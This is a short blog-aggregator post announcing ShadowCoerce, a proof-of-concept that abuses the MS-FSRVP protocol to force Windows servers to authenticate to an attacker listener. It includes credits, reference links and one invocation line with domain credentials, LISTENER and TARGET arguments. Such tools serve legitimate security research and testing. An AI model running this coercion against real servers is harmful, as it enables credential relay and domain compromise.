MS-FSRVP coercion abuse PoC

Dec 30, 2021 1 min read

ShadowCoerce

Credits: Gilles LIONEL (a.k.a. Topotam)
Source: https://twitter.com/topotam77/status/1475701014204461056

Explanation: https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp

MS Docs: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b

“File Server VSS Agent Service” needs to be enabled on the target server.

shadowcoerce.py -d "domain" -u "user" -p "password" LISTENER TARGET

In my tests, the coercion needed to be attempted twice in order to work when the FssAgent hadn’t been requested in a while. TL;DR: run the command twice if it doesn’t work.

GitHub

View Github

John was the first writer to have joined pythonawesome.com. He has since then inculcated very effective writing and reviewing culture at pythonawesome which rivals have found impossible to imitate.

MS-FSRVP coercion abuse PoC

ShadowCoerce

GitHub

John

Unofficial code reproducing Agent57

Lucky Balls: gambling game where user try to guess 6 numbers from 1 to 48 that computer has picked

ShadowCoerce

GitHub

Unofficial code reproducing Agent57

Lucky Balls: gambling game where user try to guess 6 numbers from 1 to 48 that computer has picked

You might also like...